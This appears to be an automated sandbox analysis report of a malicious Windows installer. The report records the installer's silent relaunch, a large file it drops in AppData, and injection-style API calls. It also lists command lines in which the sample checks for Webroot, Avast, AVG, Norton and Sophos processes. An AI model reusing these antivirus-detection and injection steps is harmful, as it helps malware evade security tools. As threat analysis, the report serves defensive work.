                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:12:53:33
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
                                                                                                                                                                                                                                                            Imagebase:0xbf0000
                                                                                                                                                                                                                                                            File size:8'767'044 bytes
                                                                                                                                                                                                                                                            MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 74%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:12:53:35
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$2042C,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
                                                                                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                                                                                            MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                            Start time:12:53:36
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
                                                                                                                                                                                                                                                            Imagebase:0xbf0000
                                                                                                                                                                                                                                                            File size:8'767'044 bytes
                                                                                                                                                                                                                                                            MD5 hash:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                            Start time:12:53:37
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$60272,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
                                                                                                                                                                                                                                                            Imagebase:0x860000
                                                                                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                                                                                            MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:12:54:05
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"timeout" 9
                                                                                                                                                                                                                                                            Imagebase:0x7ff787500000
                                                                                                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:12:54:05
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:12
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Imagebase:0x7ff650360000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:0x7ff74ef70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "wrsa.exe"
Imagebase:0x7ff685650000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Imagebase:0x7ff650360000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:0x7ff74ef70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "opssvc.exe"
Imagebase:0x7ff685650000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Imagebase:0x7ff650360000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:0x7ff74ef70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:12:54:14
Start date:05/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "avastui.exe"
Imagebase:0x7ff685650000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:12:54:15
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Imagebase:0x7ff650360000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:12:54:15
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:12:54:15
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:0x7ff74ef70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:12:54:15
Start date:05/01/2025
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "avgui.exe"
Imagebase:0x7ff685650000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:12:54:15
Start date:05/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Imagebase:0x7ff650360000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:12:54:15
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:12:54:15
Start date:05/01/2025
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:0x7ff74ef70000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff650360000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff74ef70000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:12:54:15
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff685650000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:12:54:21
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:846'325'235 bytes
                                                                                                                                                                                                                                                            MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:1.2%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                              Signature Coverage:31.6%
                                                                                                                                                                                                                                                              Total number of Nodes:117
                                                                                                                                                                                                                                                              Total number of Limit Nodes:10
APIs
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 022657F4
• NtMapViewOfSection.NTDLL(?,00000000), ref: 0226589C
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02265C10
• NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02265CC5
• VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02265CE2
• VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02265D85
• VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02265DB8
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02265F29
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID: Virtual$ProtectSection$CreateView$AllocThread
• String ID:
• API String ID: 1248616170-0

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,022105F1,?,00000001,?,81EC8B55,000000FF), ref: 02210AE9
• Thread32First.KERNEL32(00000000,0000001C), ref: 02210B15
• Wow64SuspendThread.KERNEL32(00000000), ref: 02210B68
• CloseHandle.KERNEL32(00000000), ref: 02210B92
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
• String ID:
• API String ID: 1849706056-0

Control-flow Graph

APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02210A27
Strings
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: ,
• API String ID: 2422867632-3772416878

Control-flow Graph

APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0221063E
• TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02210932
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID: CreateProcessTerminateThread
• String ID:
• API String ID: 1197810419-0

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 222 22663d9-22663ec 223 2266404-226640e 222->223 224 22663ee-22663f1 222->224 226 2266410-2266418 223->226 227 226641d-2266429 223->227 225 22663f3-22663f6 224->225 225->223 228 22663f8-2266402 225->228 226->227 229 226642c-2266431 227->229 228->223 228->225 230 2266464-226646b LoadLibraryA 229->230 231 2266433-226643e 229->231 234 226646e-2266472 230->234 232 2266440-2266458 call 2266aa7 231->232 233 226645a-226645e 231->233 232->233 238 2266473-2266475 232->238 233->229 236 2266460-2266462 233->236 236->230 236->234 238->234
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 0226646B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: .dll

Control-flow Graph (legend: Executed / Not Executed)
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 022650A5
• VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 022653E9
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree
• String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID:
• String ID: $ $"$%$&$($($+$,$,$-$.$/$/$0$2$3$3$6$7$:$:$;$=$=$>$@$@$@$A$A$B$C$C$D$D$D$D$E$F$G$H$I$J$K$L$M$N$O$O$O$Q$R$R$R$S$X$Z$\$\$^$^$_$_$`$`$b$c$d$e$f$f$g$h$h$j$l$m$n$n$o$s$x$x$x$y$y$y$y$z${$|$~$~

Control-flow Graph (legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID:
• String ID: $!$!$"$%$%$%$($($)$*$-$-$.$/$/$0$1$3$8$9$=$=$>$C$C$H$I$L$O$O$P$Q$S$S$T$T$U$W$X$Y$[$[$\$]$_$_$a$c$c$d$f$g$g$h$i$i$j$k$k$l$n$o$p$p$q$q$r$s$s$s$s$t$t$u$v$x$x$x$y$y$y$y$z${$|$~
Strings
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID:
• String ID: $#$'$+$+$/$0$0$4$6$9$;$;$?$@$@$@$A$C$E$G$I$I$J$L$M$N$N$N$Q$U$U$V$W$Y$[$_$`$c$h$h$i$k$m$m$m$o$o$p$q$v$y

Control-flow Graph (legend: Executed / Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
Yara matches
Similarity
• API ID:
• String ID: 5R7$%$&Y>[$)I>K$;E3G$=],_$B1O3$E%T'$P-Z/$TU$U)_+$Y!R#$Z=A?$`A C$myjl$pmta

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 1$2$4$B$D$E$F$G$b$}Mu
                                                                                                                                                                                                                                                              • API String ID: 0-3160144725
                                                                                                                                                                                                                                                              • Opcode ID: c575e92557c99177f9cd21af5c8c5142a877cfc280f5d876abeda833088a410e
                                                                                                                                                                                                                                                              • Instruction ID: 5ee2a8224702095e2b92bc0fda641b656944935a8df55f0a5a35fae530c39b20
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c575e92557c99177f9cd21af5c8c5142a877cfc280f5d876abeda833088a410e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBB1696262C7D14AC729867C981432FAFC157E2218F0C8EADE4E2CB7D7D9A9C405C753
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: '>*!$*639$.$/50x$KJ$hc$i'm.$pk5)
                                                                                                                                                                                                                                                              • API String ID: 0-1353547867
                                                                                                                                                                                                                                                              • Opcode ID: 9d80dbe84dc67f0f59595852f87e424240d060aa14ae03b574ac1ed13a6644ee
                                                                                                                                                                                                                                                              • Instruction ID: e5ff2868808a3cd45c7b409559cdbf4866038d0433790a30e94681ec629343f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d80dbe84dc67f0f59595852f87e424240d060aa14ae03b574ac1ed13a6644ee
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03B1E77125D3828BD3268F6884A076BFFE0AFE7344F08496CE4D05B386D77A854AC756
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
